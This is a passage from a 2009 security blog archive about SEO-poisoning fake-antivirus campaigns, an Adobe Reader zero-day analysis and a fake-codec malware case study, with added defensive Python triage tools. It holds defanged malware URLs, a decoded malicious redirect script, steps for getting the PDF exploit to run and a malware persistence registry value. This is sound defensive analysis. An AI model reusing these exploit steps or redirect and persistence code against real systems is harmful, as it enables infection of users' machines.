Tuesday, December 22, 2009

Malware attacks on Winter Solstice - Shortest day of the year 2009

Yesterday, December 21st 2009, was the Winter Solstice, meaning that it was the shortest day of the year. Malware authors did not miss this opportunity to push their malicious binaries using SEO (search-engine optimization) attacks. My colleague already posted a blog on SEO attacks where he mentioned that an SEO attack takes advantage of Google's PageRank technology to push search results to the top. We found that several phrases/names like “Winter Solstice 2009 celebration” or “Shortest day of the year 2009”, when used as the search query, resulted in pages redirecting to malicious sites hosting malware. Here is a screenshot of the search results:


Looking at the screenshot, you will find that the 3rd and 5th search results are malicious. Attackers use SEO because users are more likely to click on links which show up as top results. Clicking on the 3rd link uses redirection to direct the victim to a malicious site hosting malware. Here is what a user will see:


Redirection could take the victim to a variety of sites, all of which are hosting fake security applications. The malicious sites use fake images, popups or even videos to social engineer the victim into downloading a malicious executable once they click on the page. Here are a few of the sites used for downloading the malware:

“hxxp://ftorm.com/scn/579876515334ef7a1587…[truncated]”

“hxxp://shjow.com/scn/3fe14f17847082bd940b…[truncated]”

“hxxp://prizepcscan.com/?p=p52dcWpsal%2FCj…[truncated]”

“hxxp://newscanonline.info/downloads.php/?aff_id=384…[truncated]”

Here are screenshots of the malicious sites:


The above images were taken after clicking on the same search results multiple times, resulting in redirection to different attack sites and different methods used for infection. Sometimes the victim will be presented with a playing video, popup images or messages urging the victim to install fake anti-virus software. The sites displaying videos download a file named “Flash_Plugin_Setup1261476530.exe” to the system, and the other sites download “setup.exe” as the malicious file. Here are the VirusTotal results for those files:

For “Flash_Plugin_Setup1261476530.exe”

http://www.virustotal.com/analisis/78f7246e0e6b9ae58bba1581727f2f598d330cfaf34c987f1bed665ee53429cb-1261476806

For “setup.exe”

http://www.virustotal.com/analisis/2f86f7bc9139dc4267ad1325c92f08557f5a359e6d74ccb6620248b99cf9a68e-1261476933

The “setup.exe” has very poor detection (4 out of 41). This is not the first time malware authors have used the latest hot news, celebrities' names, holidays, popular events, etc. They use such key phrases to push their malicious sites to the top of the search results using SEO techniques. They continually change their malicious binaries in order to evade anti-virus detection. The success of this approach is demonstrated in the above VirusTotal results illustrating poor AV detection. Be sure to never download anything from a redirected site promising free security software.

Be Safe,

Umesh

Monday, December 21, 2009

Beware of SEO attacks

On Sunday, Tom Stuker, a United Global Services member that flew about 700,000 miles this year, was interviewed on Fox News. Not long after that, the top Google search results for Tom Stuker were all poisoned to have links that take the victim to Fake AV malware downloads.

SEO (search-engine optimization) attacks take advantage of Google's PageRank technology to have their page result bubble to the top. Google's PageRank technology is based on a web of trust: pages that are linked to are ranked as being of higher importance and thus scored higher. However, using clever hypertext content for their page and an army of bots to spread links on forums, blogs, hacked websites, etc., hackers are able to grab the top spots for their search terms of choice.

Given the speed at which these search terms are poisoned, it is likely that the hackers have bots monitoring popular media feeds for names / key-phrases that folks are likely to Google. This type of leveraging of the media as a decision-based feed for automation reminds me of the fictional book Daemon. Other members of the security industry have recently taken notice of these rapid SEO attacks as well: Brittany Murphy SEO and Beware of bad Google search results.

Following the redirects to get to the malware for one of the Tom Stuker examples seen yesterday:

hxxp://davtech.org/sqr.php?in=tom%20stuker
302s to: hxxp://hirm9k.xorg.pl?in.php?t=cc&d=20-12-2009_some2&h=davtech.org&p=http%3A%2F%www.google.com [snip...]
302s to: hxxp://newvirusscan.com/hitin.php?land=20&affid=92400
302s to: hxxp://newvirusscan.com/index.php?affid=92400

A few JavaScript files load, then the payload:
hxxp://newvirusscan.com/downloader.php?affid=92400
200 response: Content-Disposition: attachment; filename="install.exe"

Interesting stuff in the 200 OK response from the server:
Pragma: hack

Uploaded the sample to VirusTotal (first submission seen for this sample) - poor detection (13/41): http://www.virustotal.com/analisis/af58ed98fdc57ed25eb59d7e21b28f9f270bae6a5a8ca789f97876641567800f-1261348933
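The redirect chain above is the kind of artifact a proxy or sandbox analyst reconstructs from captured traffic. The following is an added example (not code from the original post): it walks a chain of captured HTTP responses offline, resolving relative Location headers, capping the hop count, stopping on loops, and reporting whether the final response hands the browser an executable attachment. The transcript in CAPTURED_RESPONSES is constructed from the hostnames in the post with the query strings simplified; nothing is fetched from the network.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed transcript: request URL -> (status, response headers).  Hosts are
# the defanged ones from the post; the full query strings were snipped there,
# so these are simplified stand-ins, not the live responses.
CAPTURED_RESPONSES = {
    "http://davtech.org/sqr.php?in=tom%20stuker": (302, {
        "Location": "http://hirm9k.xorg.pl/in.php?t=cc&h=davtech.org"}),
    "http://hirm9k.xorg.pl/in.php?t=cc&h=davtech.org": (302, {
        "Location": "http://newvirusscan.com/hitin.php?land=20&affid=92400"}),
    "http://newvirusscan.com/hitin.php?land=20&affid=92400": (302, {
        "Location": "/index.php?affid=92400"}),  # relative Location, resolved below
    "http://newvirusscan.com/index.php?affid=92400": (200, {
        "Content-Type": "text/html"}),
    "http://newvirusscan.com/downloader.php?affid=92400": (200, {
        "Content-Disposition": 'attachment; filename="install.exe"',
        "Pragma": "hack"}),
}

EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".msi")


def follow_chain(start_url, responses, max_hops=10):
    """Walk 3xx Location headers from start_url through the captured responses.

    Returns a list of (url, status) hops ending at the first non-redirect
    response, at a URL with no captured response (status None), or when a
    loop or the hop limit is hit.
    """
    chain, seen, url = [], set(), start_url
    while url not in seen and len(chain) < max_hops:
        seen.add(url)
        status, headers = responses.get(url, (None, {}))
        chain.append((url, status))
        if status is None or not (300 <= status < 400):
            break
        # Location may be relative; resolve it against the redirecting URL.
        url = urljoin(url, headers.get("Location", ""))
    return chain


def attachment_filename(headers):
    """Filename from a 'Content-Disposition: attachment' header, or None."""
    disposition = headers.get("Content-Disposition", "")
    if not disposition.lower().startswith("attachment"):
        return None
    match = re.search(r'filename="?([^";]+)"?', disposition)
    return match.group(1) if match else None


def triage(start_url, responses):
    """Summarise a chain: hop count, host churn and whether it ends in an executable download."""
    chain = follow_chain(start_url, responses)
    final_url, final_status = chain[-1]
    hosts = [urlsplit(u).netloc for u, _ in chain]
    _, final_headers = responses.get(final_url, (None, {}))
    filename = attachment_filename(final_headers)
    return {
        "hops": len(chain) - 1,
        "distinct_hosts": len(set(hosts)),
        "final_url": final_url,
        "final_status": final_status,
        "attachment": filename,
        "executable_attachment": bool(filename) and filename.lower().endswith(EXECUTABLE_SUFFIXES),
    }


if __name__ == "__main__":
    for start in ("http://davtech.org/sqr.php?in=tom%20stuker",
                  "http://newvirusscan.com/downloader.php?affid=92400"):
        print(triage(start, CAPTURED_RESPONSES))
```

Three cross-host 302s ending at a landing page, followed by a request that returns an attachment named install.exe, is the shape to alert on; the hop limit and loop check keep the walker from spinning on redirect loops that some of these kits use.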



Saturday, December 19, 2009

Going Green? The Cloud can help...

In light of the U.N. Climate Conference in Copenhagen, Denmark this week, and the agreement "to set a mitigation target to limit warming to no more than 2 degrees Celsius" I thought it would be fitting to do a quick post on the energy-saving benefits of cloud computing ... whether you are doing it to save the polar bears or to save some cash, these benefits should be recognized and considered by many organizations.

Do a Google search for cloud computing energy saving and you get about 195,000 results. This does not come as a surprise, because as one of the results states, cloud computing is "an inherently energy-efficient technology." No shock here: the amount of computing power that most organizations have is well beyond what is actually being used by their employees ... and as Moore's Law indicates, this computing power will double every two years. Many of the servers in your organization's server racks are not doing anything terribly complex: handling DNS lookups, processing email, filtering traffic, and storing data. Most organizations have a separate server for each function and may have redundant / fail-over servers as well.

This website calculates the electricity cost of running a desktop computer to be $405/year (330 Watt power supply and $0.14/kWh). A Dell PowerEdge 2970 has a 750 Watt power supply with an option for a redundant power supply for fail-over. Running this server has an electricity cost of $907/year per power supply. HowStuffWorks details how much electricity coal generates (roughly 2,460 kWh/ton). Running the example server with one power supply for a year uses 6,480 kWh, requiring 2.6 tons of coal.

Cloud computing companies often lease space in data-centers, which charge a premium for power, cooling, and rack-space (see Datacenter energy costs outpacing hardware prices). In order for companies that offer services in the cloud to remain competitive, they must be efficient with their computing power: consolidation, virtualization, efficient software, "smart" power management, etc. So adopting cloud computing is a good thing: it saves electricity/money/coal/pollution/polar bears/planet and funds the innovation of efficient computing.

Friday, December 18, 2009

1 Week 'til XMAS... Avoid Shopping Woes

Many folks are familiar with fake goods sites (e.g., replica watches and fake pharm / pill sites). These sites either peddle shoddy goods, or just flat out steal your payment credentials.

In case you needed to be reminded this holiday season, there are more than the obvious scam sites out there. Many show up in search engine results / advertisements and forum / e-mail advertisements (spam). On top of which, many have been in business for more than this holiday season.

Some examples,
hxxp://www.cheap-abercrombie.com/
hxxp://www.variantkicks.com/
hxxp://www.tiffanyoutlet.com/

You can see by visiting the sites, that their virtual store-fronts look legit:


The Name Records for each of these examples date back to 2001, 2007, and 2008:

There are many more examples of these questionable virtual storefronts. However, I was able to find a single forum spam post advertising the above examples (which is why I selected these three):

This site states that cheap-abercrombie.com advertises that their merchandise is authentic, but customers are reporting the merchandise to be poorly made replicas with no option for return / refund.

This site states that variantkicks.com sells counterfeit shoes and charges $36 USD for returns.

The tiffanyoutlet.com site does not currently resolve to an A record (but is also not showing that it is suspended by the Registrar). Google has a cached page of the site here, and Google results show that the site has been advertised via spam and is peddling fake jewelry.

Whether you are buying your sweetie a tennis bracelet, a sweater, or some new kicks this holiday season, buy from reputable stores, do your research, and if you have any doubt about the legitimacy of a store, err on the side of caution and shop elsewhere. Onguardonline.gov has more advice for online shopping here.

Don't watch-familyguyonline.com

... or at least be careful if you do.
Who doesn't like a good episode of Family Guy? Well, even if you don't, that isn't the point of this post. There are dangers in visiting and trusting sites that link to and embed content into their site without validating the content first. Malware advertisers have been leveraging pop culture content and stories to entice and social engineer their victims into downloading their malware - Michael Jackson's death themed malware is a prime example. This morning I came across some malicious redirector sites that look very much like (and may be) legit sites. Nonetheless, when a visitor follows the embedded video link to view their favorite episodes of Family Guy or another show, they receive an annoying dose of survey pages (i.e., sign me up for spam) and/or malware.

Here's a snippet of such sites for Family Guy:
watch-familyguyonline.com
www.watch-family-guy-online.com
www.watch-familyguy-online.com
watchfamilyguyonline.org

What appears to have happened here is that sites like these automatically embed links to megavideo.com or other external video sources that are tagged as being Family Guy (or other specific) episodes without validating them.

Following the redirects, I tracked these two example pages to the following malware:
hxxp://watch-familyguyonline.com/testt/
hxxp://www.watch-family-guy-online.com/season-8/episode-9-business-guy/

These loaded megavideo.com content, eventually taking the path:
  1. Megaclick.com, e.g., hxxp://s.megaclick.com/ad.code?de=9e09c529-07435895-c974b103-73e05fb5-bd3a-4-a48c&tm=1261149695.21963&du=aHR0cDovL3d3dy55ZXpsaW5rLmNvbS9zdGF0cy5waHA%2fcD1tZWdhY2xpY2tnenVz%0a&api_var_rd_mode=popunder_html
  2. Yezlink.com, e.g., hxxp://www.yezlink.com/stats.php?p=megaclickgzus
  3. 302 redirect to hxxp://www.gameztar.com/go.php?a=1839&l=112
  4. 302 redirect to hxxp://www.gameztar.com/startDownload.do?a=1839&l=112
  5. Download: hxxp://download.gameztar.com/toolbar/gameztar/download/avatar/2.1.102.r6380/000011_oSz/gameztar_installer.exe

The MD5 of the sample is: c5b8e34abfb067ddc5f294cb057f86a0
With VirusTotal results (9/41): http://www.virustotal.com/analisis/a4b092a2b60a07aa6127314e5fbf37642272ad725569ed008df108fe43fd524b-1261147802

Update:
While writing this post, it appears that the first video has already been removed by megavideo (for infringement violation).


Wednesday, December 16, 2009

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 2

Earlier, in the first blog of this series, we talked about a malicious PDF file and extracted the malicious script. Now we have the malicious script in readable format and want to know whether it runs successfully or not. I am not going to run the original malicious file for now. I will replace the original shellcode with a simple one which opens “calc.exe” after successful exploitation. The problem is that the original malicious PDF file is in encoded format, so we can’t edit the malicious script inside the file. Instead I will create a new test PDF file using the “make-pdf-javascript.py” tool from PDF Tools. This tool creates a simple PDF file containing JavaScript which displays a message box once opened. I am going to add the malicious JavaScript code to this file using the command:

D:\make-pdf-javascript.py --javascriptfile=Malicious_Script.js test.pdf

I am going to use another shellcode which will open “calc.exe”. Here is the newly created PDF file:

Let’s open it and see if this exploit works. This time it only crashed and did not open “calc.exe”. But I got a chance to look into the debugger. Here is the state of the OllyDbg debugger:

EDX currently points to zero and the code is trying to execute CALL DWORD [EDX+4]. Since EDX is zero, this raises an access violation exception. Further, we found that the module is “C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api”. Let’s change the EDX value manually in the debugger to see whether this is going to work. Since we have already filled the heap, we need to change the value accordingly. I found that our NOP sled and shellcode get loaded at address “0A0A0A0A”, so this is the value we are going to use. Here is the state of OllyDbg once I modify the values:

Now EDX points to address “0x0A0A0A0A” and [EDX+4] contains the address “0x0A0A0A20”, which is our NOP sled. So once I press “F9” (run) in OllyDbg, execution jumps to address “0A0A0A20” and executes everything from there on. You can follow this step by step while debugging. Yes, it executed the NOP sled and our shellcode, and “calc.exe” opened on the machine. But this was done by changing the values manually; it looks like there is a problem with the memory corruption. I played a little bit with the code and found that we have to add one more call of the vulnerable function before the try{} block. Here is how the modified code looks:

Once I run this file again, the shellcode executed successfully: it showed the classic popup box with an error message and opened “calc.exe”:

From the above, it is clear that there is a memory-free issue with the vulnerable method “util.printd()”. It required calling this method twice, once before and once inside the try{} block. The code then executed successfully and opened a calculator. This means that if we now remove the “calc.exe” shellcode and use the original shellcode, it is going to execute in the background without any notice. I am not going into more detail on the original shellcode this time due to the length of the blog post.

That is it for this series.

Umesh

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 1

On December 14th, Symantec and Shadowserver reported a new zero day vulnerability in the wild affecting Adobe Reader. This is now identified as CVE-2009-4324. Adobe acknowledged the same on their website, saying they are investigating this issue. And as usual, it is not the first time that PDFs are being targeted for exploitation. Earlier we saw Flash files being targeted, taking advantage of a known vulnerability in the wild. This time it is an Adobe zero day vulnerability being exploited in the wild. A colleague provided me with a sample PDF file exploiting this vulnerability in the wild. I started looking into it in depth. The PDF file was obfuscated and not in a readable format. I used my favorite “pdf-parser.py” from PDF Tools. I ran the malicious PDF file through this parser and saved the output for every element of the PDF file to a text file. Here is how it looks:

The output file was very big and I wanted to find the malicious script code inside it. As I said earlier, the file was obfuscated and contains a lot of objects/elements. I was only interested in some strings like JavaScript, FlateDecode, etc. I searched for these blocks inside the output file and found some of interest:

The above screenshots show some of the interesting blocks, which were used to uncover the malicious code inside. The “pdf-parser.py” tool has some very good options to parse certain objects inside the file. I looked at the documentation of the tool and some of the options looked valuable to me. Here are some options and their documentation, copied directly from the PDF Tools site:

“Filter option applies the filter(s) to the stream. For the moment, only FlateDecode is supported (e.g. zlib decompression). The raw option makes pdf-parser output raw data (e.g. not the printable Python representation). Objects outputs the data of the indirect object which ID was specified. This ID is not version dependent. If more than one object have the same ID (disregarding the version), all these objects will be outputted.”

This is what we need for running against suspicious blocks or objects inside the PDF file. I then ran a command against the object with ID 110, like so:

D:\>pdf-parser.py --object=110 --raw --filter malicious-file.pdf > output.log

The command ran successfully and I was interested to see whether we got any interesting data in the output file. I opened the file and found very suspicious, obfuscated JavaScript code:

From here it was easy to work. I opened the Malzilla (malware hunting) tool and copied the above script into the decoder section of the tool. I clicked the ‘Run Script’ button and obtained another script, this time in readable format. Here is how it looked:

Let’s copy this and put it in a text file so that we can see the whole script. This is a screenshot of the full script used in the PDF file:

If you look at the strings and code above, it is clearly heap spray code, and this code relates to Adobe Reader. It checks the version of the application, and only if the viewer version is greater than 8 will it exploit the vulnerability. This shows that it is targeting the latest Adobe Reader. There is also one JavaScript function called “util.printd()” inside a try{}-catch{} block, and this looks like the culprit. According to Adobe's documentation, this function returns a date using a specified format. If you look at the parameters passed to this function, they are invalid and contain @ and some long numbers. This is likely the vulnerable method causing memory corruption in Adobe Reader.
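The workflow above (find the objects, undo FlateDecode, then look for JavaScript markers such as util.printd and the version check) can be automated for triage. The following is an added example, not code from PDF Tools or from the original post: it builds a constructed minimal PDF whose JavaScript sits in a FlateDecode stream, then scans every indirect object for JavaScript-related dictionary keys and for the strings the post singles out. SAMPLE_JS is a harmless stand-in (a version check and a benign util.printd() call), not the exploit script; like the pdf-parser option quoted above, only FlateDecode is undone.

```python
import re
import zlib

# Hypothetical JavaScript for the constructed sample: a version check plus a
# well-formed util.printd() call.  It exists only to exercise the scanner and
# is not the malicious script from the post.
SAMPLE_JS = b'if (app.viewerVersion > 8) { var d = util.printd("mm/dd/yyyy", new Date()); }'


def build_sample_pdf(javascript):
    """Assemble a minimal PDF (constructed for this example) whose JavaScript
    lives in a FlateDecode-compressed stream launched from /OpenAction."""
    compressed = zlib.compress(javascript)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        b"<< /S /JavaScript /JS 5 0 R >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream",
    ]
    body = b"%PDF-1.4\n"
    for number, obj in enumerate(objects, start=1):
        body += b"%d 0 obj\n" % number + obj + b"\nendobj\n"
    return body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


OBJECT_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# Dictionary keys that attach script to a document, plus strings from the post's script.
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
              b"util.printd", b"unescape(", b"viewerVersion"]


def parse_objects(pdf_bytes):
    """Yield (object_id, object_body, decoded_stream_or_None) for each indirect object.
    Only FlateDecode is undone; other filters leave the stream as None."""
    for match in OBJECT_RE.finditer(pdf_bytes):
        obj_id, body = int(match.group(1)), match.group(3)
        stream = None
        stream_match = STREAM_RE.search(body)
        if stream_match:
            stream = stream_match.group(1)
            if b"/FlateDecode" in body:
                try:
                    stream = zlib.decompress(stream)
                except zlib.error:
                    stream = None  # corrupt or multi-filter stream; dictionary findings still count
        yield obj_id, body, stream


def scan_pdf(pdf_bytes):
    """Return {object_id: [indicators]} for objects carrying JavaScript-related markers."""
    findings = {}
    for obj_id, body, stream in parse_objects(pdf_bytes):
        hits = [m.decode() for m in SUSPICIOUS if m in body or (stream and m in stream)]
        if hits:
            findings[obj_id] = hits
    return findings


if __name__ == "__main__":
    for obj_id, hits in scan_pdf(build_sample_pdf(SAMPLE_JS)).items():
        print(f"object {obj_id}: {hits}")
```

The point the scan makes is the same one the post makes by hand: the markers only become visible after the stream is inflated, so a scanner that grep's the raw file for util.printd finds nothing in object 5, while the dictionary-level keys (/OpenAction, /JavaScript, /JS) are visible without decoding and are worth flagging on their own.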

This is the first blog of the series and I will provide more information in the second blog. The second blog will cover whether the exploit is successful or not and how it can be leveraged further. I mentioned in the Flash blog series as well that new zero day vulnerabilities continue to be discovered in the wild affecting popular applications like Adobe's. The mitigation for this is to disable JavaScript within Acrobat Reader, as described by the Shadowserver team, since Adobe does not have a patch yet.

That’s it for now. Happy hunting!!!

Umesh

Tuesday, December 15, 2009

2010 Security Predictions

2009 was the year that we learned the meaning of the word recession and looked to the cloud for answers. Budgets were slashed and security departments were forced to do more with less, all while cybercrime rates rose as frustrated individuals used whatever means necessary to earn in a difficult economic climate. What 2010 will bring remains unclear but as we approach the New Year, optimism is beginning to emerge.

On the technology front, the ‘cloud honeymoon’ is over and now the hard work begins. Mobile is as exciting as ever with new platforms and functionality emerging with vendors battling for dominance. Social networking winners have been established, but we’re just beginning to see their true potential. Much remains to be seen but one thing is for sure – attackers are following these trends just as closely as the enterprises and consumers that benefit from them. That which becomes popular today, will be the attack vector of choice tomorrow. Below are our security predictions for the New Year.

1.) Apple is forced to climb the security learning curve

Apple has for some time been considered to have a safer operating system in OS X as it is less often targeted by attackers. While that may be true, it is less secure overall and Apple's increasing market share will force them to finally invest in security due to increasing attacks targeted at Apple devices.

2.) App Store Party Crashers

App stores are all the rage, with every mobile vendor racing to replicate Apple's success. Generally, vendors stand guard and only let in the applications that they feel are appropriate. Consumers mistakenly believe that this ensures that only secure applications can be obtained but that is not the case. Security testing is limited at best with app developers already having success slipping in apps with undocumented APIs. Attackers will take things one step further and slip malicious apps in under the gatekeeper's watch.

3.) Web based worms go prime time

We've been teased with a variety of web based worms from Samy to StalkDaily. Most have been experiments as opposed to planned attacks with the goal of financial gain. That's about to change.

4.) The emergence of the web platform

We've gone from web sites to web applications and we're now seeing the birth of the web platform. Social networking sites such as Facebook have gone beyond delivering dynamic applications welcoming user-supplied content. They have now evolved into platforms inviting user-supplied functionality, allowing virtually anyone to develop unique applications within their ecosystem. Attackers will take advantage of this to deploy malicious applications on social networks, and the sites will struggle to identify and block them before deployment.

5.) Attackers turn to the cloud

The cloud offers unprecedented storage and processing power at an attractive price. Think that's only attractive to enterprises? Think again.

6.) The arrival of financial DDoS attacks

Cloud based services generally charge based on actual consumption. This provides attackers with incentive to hold enterprises hostage by artificially inflating costs. Unfortunately, cloud providers have little incentive to stop this practice.

7.) Poking holes in the cloud

My greatest hope for 2010 is that marketing departments will give the term 'cloud computing' a well-deserved break. 2009 saw great interest in the development of cloud computing architectures and one must wonder how often security was sacrificed in order to get to market quickly. Expect attackers to devote time to poking holes in the APIs of cloud providers. When they're found, thanks to multi-tenant architectures, it will have been worth the effort.

8.) Clickjacking comes out of hibernation

Clickjacking roared onto the scene in the summer of 2008 when Jeremiah Grossman and Robert Hansen had their OWASP talk delayed at the request of Adobe. The sensational web cam/microphone hack that drew media attention has been addressed, but the overall flaw still remains. Clickjacking can be a valuable tool in a social engineering attack and we’ve just begun to see it leveraged in attacks.

9.) Browser vendors finally start to take XSS seriously

I was very encouraged when Microsoft released IE 8 this year and it included cross-site scripting (XSS) protection. For all of the heat that Microsoft takes for security vulnerabilities, they continue to be a leader when it comes to adding innovative security features and this was another example. I’m confident that other browser vendors have taken notice and will fall in line.

10.) Past Data Breaches will look like child's play

This is by far the easiest prediction to make. We’ve all been amazed by the staggering numbers of compromised accounts in the CardSystems, Heartland and TJX data breaches, but prepare to be blown away once again. After all, records were made to be broken. As memory becomes cheaper and power becomes more expensive, enterprises are looking to consolidate data storage and continue to build massive data centers and develop ever larger data stores thanks to cloud computing. The volume of data that can be stolen when adequate security controls are not implemented will be truly staggering.

Monday, December 14, 2009

Case Study: Fake Codec Leveraging LastFM


The Fake Codec / Fake Anti-Virus malware campaign, historically led by the Russian Business Network (RBN), has been going on for some time (here's a blog post dating back to 2006). Dancho Danchev's blog often details this campaign as well. While the campaign hasn't changed that drastically from its inception, I thought I'd provide an overview of a case seen this morning to highlight its current state.

This morning's case used a LastFM user profile to advertise a Britney Spears sex tape:
hxxp://www.last.fm/user/BritneySpears33

LastFM is not the only victim of having malware campaigns advertised through their social networking interface (other examples where Fake Codec / AV malware has been advertised include other popular social sites: LinkedIn, Hi5, Digg, Scribd, and yes Facebook).

Here are a few more examples of these advertisements seen in LastFM (be careful if you follow these links): example 1, example 2, and example 3.

The Shoutbox portion provides a link to kick-off the "fun-filled" viewing for the unsuspecting victim ...

The link directs the would-be victim to: hxxp://bigtubeforyou.com/mirolim-video/5.html
which presents the browser with obfuscated JavaScript:

which decodes to:
var1=71;var2=var1;
if(var1==var2) document.location="hxxp://evamendesochka.com/go.php?sid=<num>";

The "sid" parameter allows the client to cycle through a round-robin of 302 redirects to Fake Code / AV malware sites including:

hxxp://showmelovetube.cn/tube.htm
hxxp://door-ringer.cn/?pid=116&sid=299a9c
hxxp://tinytubetv.com/xplaymovie.php?id=45233

With malware downloads to:

hxxp://tubefreewatch.cn/1/install_plugin.exe
hxxp://windows-antivirus2.com/download/Inst_116.exe
hxxp://clearcristalmedia.com/flash-HQ-plugin.45233.exe

Some of the A records for the above used domains:
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253

NS records for the above used domains include:
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29

Taking a look at the 66.36.0.0/19 rwhois for this hopone.net block shows that the two IP addresses used in this campaign are specifically SWIP'd out under the "sls-db4p12" network name, "svservers" organization:


The sls-db4p12 network name identifies the IPs as being part of the superb.net network. The organization, svservers, has been identified in the past (again, dating back to 2006) as involved in supporting spamming / hacking operations. SvServers is a Russian dedicated hosting service:


These redirect / malware domains will be updated by the malware provider as they are discovered and blocked (e.g., by Google / browser alerts). One of the above three was already in my browser's alerts at the time of writing this up. Fortunately for reputation-based schemes, such as Zscaler's Page Risk Indexing, these IPs and certainly the SvServers infrastructure will remain in use a bit longer by the malware provider.
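The reputation argument above rests on pivoting from throwaway domains to the hosting they share. The following is an added example, not code from the post or from Zscaler: it parses the A records quoted above (constructed here as zone-file lines), groups the names by address, derives the covering /19 from the observed addresses rather than typing one in (the /19 width is the one the post's rwhois lookup uses), and then scores a never-before-seen domain by whether it resolves into that block. The 66.36.250.7 and 93.184.216.34 addresses in the usage are constructed test inputs.

```python
import ipaddress
from collections import defaultdict

# Constructed from the A and NS records quoted in the post, in zone-file layout.
RECORDS = """
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29
"""


def parse_a_records(text):
    """Parse 'name ttl IN A address' lines into (name, ip) tuples; other types are skipped."""
    out = []
    for line in text.strip().splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[2] == "IN" and fields[3] == "A":
            out.append((fields[0].rstrip("."), ipaddress.ip_address(fields[4])))
    return out


def cluster_by_ip(records):
    """Map each address (as a string) to the sorted list of names resolving to it."""
    groups = defaultdict(list)
    for name, ip in records:
        groups[str(ip)].append(name)
    return {ip: sorted(names) for ip, names in groups.items()}


def covering_blocks(records, prefix_len=19):
    """The set of /prefix_len networks that contain the observed addresses.
    strict=False lets ipaddress mask the host bits for us."""
    return {ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False) for _, ip in records}


def assess(name, address, flagged_blocks):
    """Verdict for a domain seen for the first time: 'block' if it resolves into a
    flagged netblock, whatever the domain name is; 'allow' otherwise."""
    ip = ipaddress.ip_address(address)
    return "block" if any(ip in block for block in flagged_blocks) else "allow"


if __name__ == "__main__":
    recs = parse_a_records(RECORDS)
    for ip, names in cluster_by_ip(recs).items():
        print(ip, "->", ", ".join(names))
    blocks = covering_blocks(recs)
    print("flagged:", ", ".join(str(b) for b in sorted(blocks, key=str)))
    # Constructed addresses: one inside the flagged block, one outside it.
    print(assess("newly-registered.example", "66.36.250.7", blocks))
    print(assess("www.example", "93.184.216.34", blocks))
```

Note that both addresses fall in 66.36.224.0/19 (the /19 that contains them), so a domain registered tomorrow and pointed into the same range is caught before any blocklist has heard of it; that is the durability the post attributes to IP-based reputation.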

The malware samples have very poor detection:

Inst_116.exe
MD5: c0d2017be29e5383b1a680ef59ed22e0
VirusTotal (5/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260842320

flash-HQ-plugin.45233.exe
MD5: 2d683959e8864707f8f9808c404cd315
VirusTotal (8/41): http://www.virustotal.com/analisis/439d13cdefff86ed15051920114d10d2b190d08c1620245b15c6e56f1c8958e1-1260844620

and the most interesting for last:

install_plugin.exe
MD5: cbc1760ac498065235fea17f35eb254b
VirusTotal (0/41): http://www.virustotal.com/analisis/387b9195ab821bdc32c8e2523e1137de67305100b992df0d4393198adae292ae-1260817839

F-Prot identified the binary as being packed by NSIS. NSIS is the Nullsoft Scriptable Install System, which states the following capabilities:

The latest release was recent: NSIS 2.46 on December 6, 2009.

7-Zip advertises on its homepage that it is able to unpack NSIS archives. Running the file through 7-Zip, the following file was extracted from the NSIS file:
cryptwm97.dll
MD5: 2a823c8d471c5b7ee394e8bd2d0087f4
VirusTotal (0/41): http://www.virustotal.com/analisis/327939a7910aa4747302c66ba6f4b6f8eea8cd08a4e3065682a711149c3f318e-1260820248

The DLL is 73728 bytes and imports functionality from the Windows DLLs:
gdi32.dll, kernel32.dll, ole32.dll, shell32.dll, shlwapi.dll, user32.dll

And exports the functions:
DllInit and DllInstall

Running the install_plugin.exe through a sandbox, a file with the same MD5 as cryptwm97.dll was created on the infected system at the location:

%AppData%\atmsyssound\atmsyssound.dll

Where, %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The malware also modified the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
with value
atmsyssound = "rundll32.exe "%AppData%\atmsyssound\atmsyssound.dll", DllInit"
so that atmsyssound.dll runs its initialization function DllInit every time Windows starts.
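The persistence described above (a Run value that has rundll32.exe load a DLL from the user's profile and call a named export) is easy to spot in a registry export. The following is an added example, not code from the post: it parses the Run key section of a constructed .reg export (REG_EXPORT, with the escaping Regedit uses), unescapes the values, and flags rundll32 entries whose DLL lives under a user-writable profile directory, keeping the export name so an analyst knows what to look at. The ctfmon, Updater and Shell Hardware entries are constructed benign controls.

```python
import re

# Constructed .reg export in Regedit's format: backslashes are doubled and
# embedded quotes are escaped with a backslash.  The atmsyssound value is the
# one from the post; the other three are benign controls.
REG_EXPORT = r'''
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"atmsyssound"="rundll32.exe \"%AppData%\\atmsyssound\\atmsyssound.dll\", DllInit"
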